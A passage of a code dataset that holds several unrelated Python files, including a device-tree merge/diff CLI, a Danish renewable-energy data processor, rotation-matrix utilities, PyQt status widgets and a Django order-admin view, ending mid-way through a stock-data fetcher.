help=\"Tabulator Size\")\n@click.option('-i', '--intype', type=click.Choice(['auto', 'dts', 'dtb']),\n default='auto', show_default=True, help=\"Input file type\")\ndef merge(outfile, infiles, tabsize, intype):\n \"\"\" Merge two and more *.dtb or *.dts files into one *.dts file \"\"\"\n def open_fdt(file_path, file_type):\n if file_type == 'auto':\n if file_path.endswith(\".dtb\"):\n file_type = 'dtb'\n elif file_path.endswith(\".dts\"):\n file_type = 'dts'\n else:\n raise Exception('Not supported file extension: {}'.format(file_path))\n try:\n if file_type == 'dtb':\n with open(file_path, 'rb') as f:\n obj = fdt.parse_dtb(f.read())\n else:\n with open(file_path, 'r') as f:\n obj = fdt.parse_dts(f.read(), os.path.dirname(file_path))\n except Exception as e:\n raise Exception('Not supported file format: {} {}'.format(file_path, str(e)))\n\n return obj\n\n fdt_obj = None\n\n if not infiles:\n click.echo(\"Usage: pydtc todtb [OPTIONS] [INFILES]...\")\n click.echo(\"\\nError: Missing argument \\\"infiles\\\"\")\n sys.exit(ERROR_CODE)\n\n if len(infiles) < 2:\n click.echo(\"Usage: pydtc todtb [OPTIONS] [INFILES]...\")\n click.echo(\"\\nError: Minimum is two \\\"infiles\\\"\")\n sys.exit(ERROR_CODE)\n\n try:\n for file in infiles:\n if fdt_obj is None:\n fdt_obj = open_fdt(file, intype)\n else:\n fdt_obj.merge(open_fdt(file, intype))\n\n with open(outfile, 'w') as f:\n f.write(fdt_obj.to_dts(tabsize))\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" Merge output saved as: %s\" % outfile)\n\n\n@cli.command(short_help=\"Compare two *.dtb or *.dts files\")\n@click.argument('file1', nargs=1, type=click.Path(exists=True))\n@click.argument('file2', nargs=1, type=click.Path(exists=True))\n@click.option('-t', '--intype', type=click.Choice(['auto', 'dts', 'dtb']),\n default='auto', show_default=True, help=\"Input file type\")\n@click.option('-o', '--outdir', type=click.Path(), default=None, help=\"Output directory/path [default: diff_out]\")\ndef diff(file1, file2, intype, outdir):\n \"\"\" Compare two *.dtb or *.dts files \"\"\"\n\n def open_fdt(file_path, file_type):\n if file_type == 'auto':\n if file_path.endswith(\".dtb\"):\n file_type = 'dtb'\n elif file_path.endswith(\".dts\"):\n file_type = 'dts'\n else:\n raise Exception('Not supported file extension: {}'.format(file_path))\n try:\n if file_type == 'dtb':\n with open(file_path, 'rb') as f:\n obj = fdt.parse_dtb(f.read())\n else:\n with open(file_path, 'r') as f:\n obj = fdt.parse_dts(f.read(), os.path.dirname(file_path))\n except:\n raise Exception('Not supported file format: {}'.format(file_path))\n\n return obj\n\n try:\n # load input files\n fdt1 = open_fdt(file1, intype)\n fdt2 = open_fdt(file2, intype)\n # compare it\n diff = fdt.diff(fdt1, fdt2)\n if diff[0].empty:\n click.echo(\" Input files are completely different !\")\n sys.exit()\n # create output directory\n if outdir is None:\n outdir = \"diff_out\"\n os.makedirs(outdir, exist_ok=True)\n # save the diff\n file_name = (\n \"same.dts\",\n os.path.splitext(os.path.basename(file1))[0] + \".dts\",\n os.path.splitext(os.path.basename(file2))[0] + \".dts\")\n for index, obj in enumerate(diff):\n if not obj.empty:\n with open(os.path.join(outdir, file_name[index]), 'w') as f:\n f.write(obj.to_dts())\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" Diff output saved into: %s\" % outdir)\n\n\ndef main():\n cli(obj={})\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fdt/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"127529953","text":"import random\nimport json\nimport datetime\nimport config\nimport pprint\n\n1453379348690\n\nfor x in range(60):\n d = dict()\n timestamp = 1453379348 + 60*x\n dt = datetime.datetime.fromtimestamp(timestamp)\n d['timestamp'] = timestamp\n d['panid'] = 20257\n d['device'] = 20257\n d['domain'] = 'INTEREXPORT'\n d['vehicles'] = []\n for x in range(random.randint(1,10)):\n v = dict()\n v['timestamp'] = random.randint(timestamp, timestamp+60)\n v['lane'] = random.randint(1, 3)\n v['inverse'] = False\n v['length'] = random.uniform(2,9)\n v['speed'] = random.uniform(10,100)\n v['occupancy'] = random.randint(300,500)\n v['headway'] = random.randint(800,3000)\n v['gap'] = random.uniform(10,50)\n d['vehicles'].append(v)\n aggr = []\n i = 1\n aggr.append([x for x in d['vehicles'] if x['lane'] == 1])\n aggr.append([x for x in d['vehicles'] if x['lane'] == 2])\n aggr.append([x for x in d['vehicles'] if x['lane'] == 3])\n d['aggregate'] = []\n d['classifier_length'] = []\n d['classifier_speed'] = []\n for lane in aggr:\n l = dict()\n l['lane'] = i\n l['intensity'] = len(lane)\n l['occupancy'] = sum((veh['occupancy'] for veh in lane))/6000\n if len(lane) > 0:\n l['avgSpeed'] = sum((veh['speed'] for veh in lane))/len(lane)\n l['avgLength'] = sum((veh['length'] for veh in lane))/len(lane)\n l['avgHeadway'] = sum((veh['headway'] for veh in lane))/len(lane)\n l['avgGap'] = sum((veh['gap'] for veh in lane))/len(lane)\n else:\n l['avgSpeed'] = 0\n l['avgLength'] = 0\n l['avgHeadway'] = 0\n l['avgGap'] = 0\n d['aggregate'].append(l)\n cl = dict()\n cl['lane'] = i\n cl['short'] = len([x for x in lane if x['length'] <= 4])\n cl['medium'] = len([x for x in lane if x['length'] > 4 and x['length'] <=6])\n cl['large'] = len([x for x in lane if x['length'] > 6])\n d['classifier_length'].append(cl)\n cs = dict()\n cs['lane'] = i\n cs['less_60'] = len([x for x in lane if x['speed'] <= 60])\n cs['between_60_and_100'] = len([x for x in lane if x['speed'] > 60 and x['length'] <=100])\n cs['over_100'] = len([x for x in lane if x['length'] > 100])\n d['classifier_speed'].append(cs)\n i = i+1\n with open(\"LaMarina{}.json\".format(dt.strftime(\"%d%m%Y%H%M%S\")), 'w') as f:\n json.dump(d, f)\n","sub_path":"generate_entries.py","file_name":"generate_entries.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"471166267","text":"import logging\nimport os\nimport posixpath\nimport urllib.parse\nimport urllib.request\nimport re\nimport zipfile\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nimport utm # for transforming geoinformation in the utm format\nimport requests\nfrom string import Template\nfrom IPython.display import display\nfrom pathlib import Path\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%d %b %Y %H:%M:%S'\n)\n\nlogger = logging.getLogger()\n\nfof = os.path.realpath(__file__)\npath = os.path.split(fof)[0][:-2]\n\n# Get column translation list\ncolumnnames = pd.read_csv(os.path.join('input', path + 'service\\\\' + 'column_translation_list.csv'))\ncolumnnames.head(2)\n\n# Get value translation list\nvaluenames = pd.read_csv(os.path.join('input', path + 'service\\\\' + 'value_translation_list.csv'))\nvaluenames.head(2)\n\n\ndef download_and_cache(url, session=None):\n \"\"\"This function downloads a file into a folder called \n original_data and returns the local filepath.\"\"\"\n path = urllib.parse.urlsplit(url).path\n filename = posixpath.basename(path)\n filepath = os.path.join('input', 'original_data', filename)\n\n # check if file exists, if not download it\n if not os.path.exists(filepath):\n if not session:\n print('No session')\n session = requests.session()\n\n r = session.get(url, stream=True)\n\n chuncksize = 1024\n with open(filepath, 'wb') as file:\n for chunck in r.iter_content(chuncksize):\n file.write(chunck)\n filepath = '' + filepath\n return filepath\n\ndef check_file_existence(url):\n hh = url.split('/')[-1]\n ff = './input/' + hh\n try:\n file = open(ff)\n file.close()\n link = url.split('/')[-1]\n except:\n r = requests.get(url).status_code\n if r != 200: print('Invalid file path: ' + '\"' + url + '\"')\n return\n link = url\n return link\n\ndef main():\n # Here you need to specify the path with the location of the files on the Internet\n\n DK_ens = 'https://ens.dk/sites/ens.dk/files/Vindenergi/anlaegprodtilnettet.xls'\n DK_energinet = 'https://www.energinet.dk/-/media/Energinet/El-CSI/Dokumenter/Data/SolcellerGraf-2016-11.xlsx'\n DK_geo = 'http://download.geonames.org/export/zip/DK.zip'\n\n url_DK_ens = check_file_existence(DK_ens)\n url_DK_energinet = check_file_existence(DK_energinet)\n url_DK_geo = check_file_existence(DK_geo)\n \n # Get wind turbines data\n DK_wind_df = pd.read_excel('./input/' + url_DK_ens,\n sheet_name='IkkeAfmeldte-Existing turbines',\n thousands='.',\n header=17,\n skipfooter=3,\n usecols=16,\n converters={'Møllenummer (GSRN)': str,\n 'Kommune-nr': str,\n 'Postnr': str}\n )\n\n # Get photovoltaic data\n DK_solar_df = pd.read_excel('./input/' + url_DK_energinet, \n sheet_name='Data',\n converters={'Postnr': str}\n )\n\n # Choose the translation terms for Denmark, create dictionary and show dictionary\n idx_DK = columnnames[columnnames['country'] == 'DK'].index\n column_dict_DK = columnnames.loc[idx_DK].set_index('original_name')['opsd_name'].to_dict()\n\n # Windows has problems reading the csv entry for east and north (DK).\n # The reason might be the difference when opening the csv between linux and\n # windows.\n column_dict_DK_temp = {}\n for k, v in column_dict_DK.items():\n column_dict_DK_temp[k] = v\n if v == 'utm_east' or v == 'utm_north':\n # merge 2 lines to 1\n new_key = ''.join(k.splitlines())\n column_dict_DK_temp[new_key] = v\n\n column_dict_DK = column_dict_DK_temp\n\n column_dict_DK\n\n # Translate columns by list\n DK_wind_df['X (øst) koordinat UTM 32 Euref89'] = DK_wind_df['X (øst) koordinat \\nUTM 32 Euref89']\n DK_wind_df['Y (nord) koordinat UTM 32 Euref89'] = DK_wind_df['Y (nord) koordinat \\nUTM 32 Euref89']\n\n #and 13 are the keys that make problems\n DK_wind_df.drop(DK_wind_df.columns[[12, 13]], axis=1, inplace=True)\n\n # Replace column names based on column_dict_DK\n DK_wind_df.rename(columns=column_dict_DK, inplace=True)\n DK_solar_df.rename(columns=column_dict_DK, inplace=True)\n\n # Add names of the data sources to the DataFrames\n DK_wind_df['data_source'] = 'Energistyrelsen'\n DK_solar_df['data_source'] = 'Energinet.dk'\n\n # Add energy source level 2 and technology for each of the two DataFrames\n DK_wind_df['energy_source_level_2'] = 'Wind'\n DK_solar_df['energy_source_level_2'] = 'Solar'\n DK_solar_df['technology'] = 'Photovoltaics'\n\n # Choose the translation terms for Denmark, create dictionary and show dictionary\n idx_DK = valuenames[valuenames['country'] == 'DK'].index\n value_dict_DK = valuenames.loc[idx_DK].set_index('original_name')['opsd_name'].to_dict()\n value_dict_DK\n\n # Replace all original value names by the OPSD value names\n DK_wind_df.replace(value_dict_DK, inplace=True)\n\n # Index for all values with utm information\n idx_notnull = DK_wind_df['utm_east'].notnull()\n\n # Convert from UTM values to latitude and longitude coordinates\n DK_wind_df['lonlat'] = DK_wind_df.loc[idx_notnull, ['utm_east', 'utm_north']\n ].apply(lambda x: utm.to_latlon(x[0],\n x[1],\n 32,\n 'U'), axis=1).astype(str)\n\n # Split latitude and longitude in two columns\n lat = []\n lon = []\n\n for row in DK_wind_df['lonlat']:\n try:\n # Split tuple format\n # into the column lat and lon\n row = row.lstrip('(').rstrip(')')\n lat.append(row.split(',')[0])\n lon.append(row.split(',')[1])\n except:\n # set NAN\n lat.append(np.NaN)\n lon.append(np.NaN)\n\n DK_wind_df['lat'] = pd.to_numeric(lat)\n DK_wind_df['lon'] = pd.to_numeric(lon)\n\n # drop lonlat column that contains both, latitute and longitude\n DK_wind_df.drop('lonlat', axis=1, inplace=True)\n\n\n # Get geo-information\n zip_DK_geo = zipfile.ZipFile('./input/' + url_DK_geo)\n\n # Read generated postcode/location file\n DK_geo = pd.read_csv(zip_DK_geo.open('DK.txt'), sep='\\t', header=-1)\n\n # add column names as defined in associated readme file\n DK_geo.columns = ['country_code', 'postcode', 'place_name', 'admin_name1',\n 'admin_code1', 'admin_name2', 'admin_code2', 'admin_name3',\n 'admin_code3', 'lat', 'lon', 'accuracy']\n\n # Drop rows of possible duplicate postal_code\n DK_geo.drop_duplicates('postcode', keep='last', inplace=True)\n DK_geo['postcode'] = DK_geo['postcode'].astype(str)\n\n # Add longitude/latitude infomation assigned by postcode (for Energinet.dk data)\n DK_solar_df = DK_solar_df.merge(DK_geo[['postcode', 'lon', 'lat']],\n on=['postcode'],\n how='left')\n\n # Show number of units with missing coordinates seperated by wind and solar\n print('Missing Coordinates DK_wind ', DK_wind_df.lat.isnull().sum())\n print('Missing Coordinates DK_solar ', DK_solar_df.lat.isnull().sum())\n\n # Merge DataFrames for wind and solar into DK_renewables\n dataframes = [DK_wind_df, DK_solar_df]\n DK_renewables = pd.concat(dataframes)\n DK_renewables = DK_renewables.reset_index()\n\n # Assign energy source level 1 to the dataframe\n DK_renewables['energy_source_level_1'] = 'Renewable energy'\n\n # Select those columns of the orignal data which are utilised further\n column_interest = ['commissioning_date', 'energy_source_level_1', 'energy_source_level_2',\n 'technology', 'electrical_capacity_kW', 'dso', 'gsrn_id', 'postcode',\n 'municipality_code', 'municipality', 'address', 'address_number',\n 'utm_east', 'utm_north', 'lon', 'lat', 'hub_height',\n 'rotor_diameter', 'manufacturer', 'model', 'data_source']\n\n # Clean DataFrame from columns other than specified above\n DK_renewables = DK_renewables.loc[:, column_interest]\n DK_renewables.reset_index(drop=True, inplace=True)\n\n # kW to MW\n DK_renewables['electrical_capacity_kW'] /= 1000\n\n # adapt column name\n DK_renewables.rename(columns={'electrical_capacity_kW': 'electrical_capacity'},\n inplace=True)\n\n DK_renewables.to_pickle('output/DK_renewables.pickle')\n DK_renewables.to_csv('output/DK_renewables.csv',sep=';', index=False, encoding='utf-8-sig', mode='w', header=True)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"DK/download_and_ process.py","file_name":"download_and_ process.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85027575","text":"import numpy as np\r\nimport math as m\r\nfrom typing import List, Tuple, Union\r\nfrom functools import lru_cache\r\n\r\n\r\n# import ray.rays_pool as rays_pool\r\n\r\n\r\nclass Generator:\r\n\r\n @staticmethod\r\n @lru_cache()\r\n def get_rot_mat2d_cashed_int(tetha:int):\r\n tetha = np.deg2rad(int(tetha))\r\n return Generator.get_rot_mat_2d(tetha)\r\n\r\n @staticmethod\r\n def get_rot_mat_2d(tetha: float):\r\n s, c = np.sin(tetha), np.cos(tetha)\r\n return np.array(\r\n ((c, -s),\r\n (s, c))\r\n )\r\n\r\n @staticmethod\r\n def get_rot_mat_x_3d(a: float):\r\n \"\"\"Right system. Rotation contr clock wise\"\"\"\r\n Mx = (\r\n (1, 0, 0),\r\n (0, m.cos(a), -m.sin(a)),\r\n (0, m.sin(a), m.cos(a))\r\n )\r\n return Mx\r\n\r\n @staticmethod\r\n def get_rot_mat_y_3d(b: float):\r\n \"\"\"Right system. Rotation contr clock wise\"\"\"\r\n My = (\r\n (m.cos(b), 0, m.sin(b)),\r\n (0, 1, 0),\r\n (-m.sin(b), 0, m.cos(b))\r\n )\r\n return My\r\n\r\n @staticmethod\r\n def get_rot_mat_z_3d(g: float):\r\n \"\"\"Right system. Rotation contr clock wise\"\"\"\r\n Mz = (\r\n (m.cos(g), -m.sin(g), 0),\r\n (m.sin(g), m.cos(g), 0),\r\n (0, 0, 1),\r\n )\r\n return Mz\r\n\r\n @staticmethod\r\n def get_rot_mat_3d(a: float, b: float, g: float):\r\n \"\"\"Right system. Rotation contr clock wise\"\"\"\r\n return Generator.get_rot_mat_x_3d(a), Generator.get_rot_mat_y_3d(b), Generator.get_rot_mat_z_3d(g)\r\n\r\n @staticmethod\r\n def get_euler_rot_matrix(alpha: float, beta: float, gamma: float):\r\n return np.matmul(Generator.get_rot_mat_z_3d(alpha),\r\n np.matmul(Generator.get_rot_mat_x_3d(beta),\r\n Generator.get_rot_mat_z_3d(gamma)))\r\n\r\n @staticmethod\r\n def rot_shift_mat(rot_coef: (List[Union[float, int]], Tuple[Union[float, int]], np.ndarray),\r\n shift_coef: (List[Union[float, int]], Tuple[Union[float, int]], np.ndarray) = (0, 0, 0)) \\\r\n -> np.ndarray:\r\n if len(rot_coef) != 3 or len(shift_coef) != 3:\r\n raise AttributeError(\r\n \"Coefficients is in wrong dimension. \" +\r\n \"rot_coef(%d),shift_coef(%d)\" % (len(rot_coef), len(shift_coef)))\r\n if not all((isinstance(i, float) or isinstance(i, int))\r\n and (isinstance(j, float) or isinstance(j, int))\r\n for i, j in zip(rot_coef, shift_coef)):\r\n raise TypeError(\"Some element in rot_coef or shift_coef is not float or int\")\r\n\r\n cos_r_c = [np.cos(arg) for arg in rot_coef]\r\n sin_r_c = [np.sin(arg) for arg in rot_coef]\r\n\r\n rot_mat_x = [\r\n [1, 0, 0],\r\n [0, cos_r_c[0], -sin_r_c[0]],\r\n [0, sin_r_c[0], cos_r_c[0]]\r\n ]\r\n rot_mat_y = [\r\n [cos_r_c[1], 0, sin_r_c[1]],\r\n [0, 1, 0],\r\n [-sin_r_c[1], 0, cos_r_c[1]]\r\n ]\r\n rot_mat_z = [\r\n [cos_r_c[2], -sin_r_c[2], 0],\r\n [sin_r_c[2], cos_r_c[2], 0],\r\n [0, 0, 1]\r\n ]\r\n coord_transform = np.ndarray((4, 4))\r\n coord_transform[:3, :3] = np.matmul(np.matmul(rot_mat_x, rot_mat_y), rot_mat_z)\r\n coord_transform[:3, 3] = shift_coef\r\n return coord_transform\r\n\r\n @staticmethod\r\n def nd_generator(begin: list | tuple | np.ndarray, end: list | tuple | np.ndarray, cnt_per_param: list | tuple):\r\n \"\"\"begin, end values must be a numbers\"\"\"\r\n linspace_values = [\r\n np.linspace(begin[i], end[i], cnt_per_param[i], endpoint=True)\r\n for i in range(len(end))\r\n ]\r\n j_ind = np.zeros(shape=len(end), dtype=int)\r\n while True:\r\n cur_values = [linspace_values[j][j_ind[j]] for j in range(len(end))]\r\n yield cur_values\r\n for i in range(len(end)):\r\n j_ind[i] = j_ind[i] + 1\r\n if j_ind[i] == cnt_per_param[i]:\r\n j_ind[i] = 0\r\n continue\r\n break\r\n else: # if it is passed all iteration of cycle for, then iterating is end. j_ind array become like np.zeros\r\n break\r\n\r\n\r\nif __name__ == '__main__':\r\n begin = np.asarray((0, 0, 0))\r\n end = np.asarray((5, 4, 3))\r\n cnt_per_param = (6, 5, 4)\r\n for i in Generator.nd_generator(begin, end, cnt_per_param):\r\n print(i)","sub_path":"tools/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351399112","text":"import threading\nfrom multiprocessing import Queue\n\n\nclass TaskManager(object):\n INSTANCE = None\n UrlQueue = Queue()\n DataQueue = Queue()\n\n lock = threading.RLock()\n\n def __new__(cls):\n cls.lock.acquire()\n if cls.INSTANCE is None:\n cls.INSTANCE = super(TaskManager, cls).__new__(cls)\n cls.lock.release()\n return cls.INSTANCE\n\nif __name__ == \"__main__\":\n a = TaskManager()\n b = TaskManager()\n print(id(a.DataQueue))\n print(id(b.DataQueue))\n print(id(a.UrlQueue))\n print(id(b.UrlQueue))\n","sub_path":"TaskManager.py","file_name":"TaskManager.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"335459508","text":"from PyQt5.QtWidgets import QLabel, QDesktopWidget\nfrom PyQt5 import QtCore\n\n\nclass EngMode(QLabel):\n def __init__(self, widget):\n super().__init__('', widget)\n self.setStyleSheet('background-color: #F2A408; font-size: 20px; border: 3px outset #9C9C9C;')\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.blink)\n self.blinked = False\n\n def blink(self):\n self.setText('') if self.blinked else self.setText('Engineering Mode')\n self.blinked = not self.blinked\n\n def setOn(self):\n self.show()\n self.timer.start(1000)\n\n def setOff(self):\n self.hide()\n self.timer.stop()\n\n\nclass PLCState(QLabel):\n def __init__(self, widget):\n super().__init__(widget)\n self.setStyleSheet('background-color: #BFCDDB; font-size: 20px; border: 3px outset #9C9C9C;')\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n\n def setState(self, state):\n if state == 0:\n self.setText('The Machine is Idle')\n elif state == 1:\n self.setText('The Machine is Initializing')\n elif state == 2:\n self.setText('The Machine is Ready')\n elif state == 3:\n self.setText('The Machine Works')\n elif state == 4:\n self.setText('The Machine is Paused')\n elif state == 5:\n self.setText('The Machine is Halted')\n\n\nclass MachineError(QLabel):\n def __init__(self, widget):\n super().__init__(widget)\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n self.setStyleSheet('background-color: #BFCDDB; font-size: 16px; border: 3px outset #9C9C9C;')\n\nclass GoldenSample(QLabel):\n def __init__(self, widget):\n super().__init__(widget)\n self.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)\n self.setStyleSheet('background-color: #F2A408; font-size: 16px; border: 3px outset #9C9C9C;')\n","sub_path":"Miscs.py","file_name":"Miscs.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146712134","text":"class Solution:\n def goodDaysToRobBank(self, security: List[int], time: int) -> List[int]:\n left, right = [0]*len(security), [0]*len(security)\n for i in range(1, len(security)):\n if security[i-1] >= security[i]:\n left[i] = left[i-1]+1\n else:\n left[i] = 0\n\n for i in reversed(range(len(security)-1)):\n if security[i] <= security[i+1]:\n right[i] = right[i+1]+1\n else:\n right.append(0)\n\n res = []\n for i in range(len(security)):\n if left[i] >= time and right[i] >= time:\n res.append(i)\n return res\n","sub_path":"stack/2100_Find_Good_Days_to_Rob_the_Bank.py","file_name":"2100_Find_Good_Days_to_Rob_the_Bank.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"342737865","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport datetime\n\nfrom django.views.generic import TemplateView\nfrom django.utils.encoding import smart_unicode\nfrom django.utils.decorators import method_decorator\nimport xlrd\n\nfrom luckycommon.order.handler import show_order\n\nfrom luckycommon.push import handler as push_handler\nfrom luckycommon.cache import redis_cache\nfrom luckycommon.db.goods import get_goods\nfrom luckycommon.db.activity import get_activity\nfrom luckycommon.account.db.account import get_account\nfrom luckycommon.order.model.order import ORDER_STATUS\nfrom luckycommon.order.db import order as db\nfrom luckycommon.utils.decorator import response_wrapper\nfrom luckycommon.utils.api import token_required, check_params\nfrom luckycommon.utils.tz import utc_to_local_str\nfrom luckycommon.utils.exceptions import SmsPlatformError, NotImplementedError\nfrom luckycommon.utils.export import redirect_to_file, gen_filename\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass OrderView(TemplateView):\n\n def get(self, req):\n query_dct = req.GET.dict()\n export = query_dct.pop('$export', None)\n resp_items = []\n\n if export:\n filename = gen_filename('export_order')\n status = query_dct.get('status')\n data = None\n if status and int(status) == ORDER_STATUS.WAIT_SHIP:\n cn_header = [u'订单ID', u'用户ID', u'收货人', u'省', u'市', u'县',\n u'街道', u'送货地址', u'收货人手机号', u'商品编号',\n u'商品名称', u'备注']\n data = db.export_awarded_orders(query_dct)\n elif status and int(status) == ORDER_STATUS.AWARDED:\n cn_header = [u'订单ID', u'用户ID', u'收货人', u'省', u'市', u'县',\n u'街道', u'送货地址', u'收货人手机号', u'商品编号',\n u'商品名称', u'备注']\n data = db.export_awarded_orders(query_dct)\n elif status and int(status) == ORDER_STATUS.WAIT_RECEIPT:\n cn_header = [u'发货时间', u'订单ID', u'用户ID', u'活动名称',\n u'快递名', u'快递单号', u'供货商', u'购买价格']\n data = db.export_sent_orders(query_dct)\n if data:\n return redirect_to_file(data, cn_header, filename)\n else:\n raise NotImplementedError('not support')\n\n # normal\n items, total_count, award_only = db.list_orders(query_dct, True)\n for item in items:\n order, is_virtual = item\n k = order.as_dict()\n if award_only:\n k['id'] = str(k.pop('order_id'))\n k['buyer'] = str(k.pop('user_id'))\n else:\n k['id'] = str(k['id'])\n k['buyer'] = str(k['buyer'])\n activity = get_activity(k['activity_id'])\n k['is_virtual'] = is_virtual\n k['activity_name'] = activity.name\n k['term_number'] = activity.term_number\n k['target_amount'] = activity.target_amount\n k['updated_at'] = utc_to_local_str(k['updated_at'])\n k['created_at'] = utc_to_local_str(k['created_at'])\n resp_items.append(k)\n\n return {'list': resp_items, 'page': query_dct.get('$page', 1),\n 'size': len(resp_items), 'total_count': total_count}\n\n def post(self, req):\n # batch ship from excel\n if 'excel_data' in req.FILES:\n data = req.FILES['excel_data']\n imported_data = []\n book = xlrd.open_workbook(file_contents=data.read())\n sh = book.sheet_by_index(0)\n for x in range(sh.nrows):\n imported_data.append(sh.row_values(x))\n shipp_push = db.batch_ship_orders(imported_data, req.user_id)\n for order_id, shipping_info in shipp_push:\n try:\n push_handler.push_shipping(order_id, shipping_info)\n except SmsPlatformError as e:\n _LOGGER.error('FAIL to send notify', e)\n continue\n else:\n # batch autoship jd\n params = json.loads(req.body)\n check_params(params, ['order_ids'])\n for order_id in params['order_ids']:\n db.send_order(order_id)\n return {}\n\n @method_decorator(response_wrapper)\n @method_decorator(token_required)\n def dispatch(self, *args, **kwargs):\n return super(OrderView, self).dispatch(*args, **kwargs)\n\n\nclass SingleOrderView(TemplateView):\n\n def get(self, req, order_id):\n item = db.get_awarded_order(long(order_id))\n if item:\n data = item.as_dict()\n data['id'] = str(data.pop('order_id'))\n data['buyer'] = str(data.pop('user_id'))\n data['advise_delivery_time'] = 'No Delay'\n if data['status'] in (5, 11):\n gp_flag = redis_cache.get_gp_delivery_timestamp(data['buyer'])\n extend = json.loads(data['extend'])\n if gp_flag:\n award_time = extend.get('award_time')\n advise_delivery_time = datetime.datetime.strptime(award_time, '%Y-%m-%d %H:%M:%S') \\\n + datetime.timedelta(3)\n data['advise_delivery_time'] = advise_delivery_time.strftime('%Y-%m-%d %H:%M:%S')\n else:\n item = db.get_order(long(order_id))\n data = item.as_dict()\n data['id'] = str(data['id'])\n data['buyer'] = str(data['buyer'])\n\n activity = get_activity(data['activity_id'])\n buyer = get_account(data['buyer'])\n data['buyer_phone'] = buyer.phone if buyer else ''\n data['target_amount'] = activity.target_amount\n goods = get_goods(activity.goods_id)\n data['is_virtual'] = redis_cache.is_virtual_account(data['buyer'])\n data['activity_name'] = activity.name\n data['term_number'] = activity.term_number\n data['source'] = goods.source if goods else 'unknown'\n data['goods_price'] = goods.price if goods else 'unknown'\n return data\n\n def post(self, req, order_id):\n return self.put(req, order_id)\n\n def put(self, req, order_id):\n query_dct = json.loads(smart_unicode(req.body))\n shipping_push, receipt_push = db.update_order_info(\n int(order_id), query_dct, req.user_id)\n extend = query_dct['extend']\n try:\n extend = json.loads(extend)\n except ValueError as e:\n _LOGGER.error('order extend invalid value, %s' % e)\n if shipping_push and isinstance(extend, dict): # 确认发货\n shipping_info = {\n 'express': extend.get('express'),\n 'express_num': extend.get('express_num')\n }\n if not shipping_info['express']:\n shipping_info = {}\n push_handler.push_shipping(order_id, shipping_info)\n if shipping_push and not isinstance(extend, dict): # 确认发货\n push_handler.push_shipping(order_id, {})\n if receipt_push:\n push_handler.push_receipt(order_id)\n # 创建晒单\n order = db.get_order(order_id)\n show_order(order)\n\n _LOGGER.info('update order %s info: %s, user: %s', order_id,\n query_dct, req.user_id)\n return {}\n\n @method_decorator(response_wrapper)\n @method_decorator(token_required)\n def dispatch(self, *args, **kwargs):\n return super(SingleOrderView, self).dispatch(*args, **kwargs)\n","sub_path":"luckyadmin/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"457949747","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 27 18:18:50 2019\r\n\r\n@author: Ignacio Colino\r\n\"\"\"\r\nimport time\r\nimport pandas as pd\r\nimport requests\r\nimport os\r\n\r\n\"\"\"This module has the function to get the daily price data for different\r\nmarkets.\"\"\"\r\n\r\n\r\n# Get the adjusted Data\r\ndef get_adjusted_data(market='ASX', num_stocks=None, tickers=None):\r\n \"\"\"This function outputs a csv file with the historical daily price data\r\n for the corresponding market. The stock codes are picked up from the csv\r\n files in the folder\"\"\"\r\n try:\r\n # Parameters for API request\r\n stock_list = {'ASX': '20180801-asx200.csv',\r\n 'SNP': '20180922_SP500_list.csv',\r\n 'CRY': 'digital_currency_list.CSV'}\r\n symbol_list = pd.read_csv(stock_list[market], header=1)\r\n names = ['open', 'high', 'low', 'close', 'adjusted_close', 'volume',\r\n 'dividend_amount', 'split_coefficient', 'symbol', 'date']\r\n cry_names_drop = ['1b. open (USD)', '2b. high (USD)',\r\n '3b. low (USD)', '4b. close (USD)']\r\n cry_names = ['open', 'high', 'low', 'close', 'volume', 'market_cap',\r\n 'symbol', 'date']\r\n data = pd.DataFrame(columns=['Symbol'])\r\n url = \"https://www.alphavantage.co/query?\"\r\n if tickers is not None:\r\n symbol_list = pd.DataFrame(tickers)\r\n if num_stocks is not None:\r\n symbol_list = symbol_list.sample(num_stocks)\r\n # Loop through stock list and concatenate\r\n for code in symbol_list.iloc[:, 0]:\r\n if code not in data['Symbol'].unique():\r\n # query structure\r\n para = {\"function\": \"TIME_SERIES_DAILY_ADJUSTED\",\r\n \"apikey\": os.getenv('ALPHA_VANTAGE')}\r\n if market == 'CRY':\r\n para['market'] = 'USD'\r\n para['function'] = 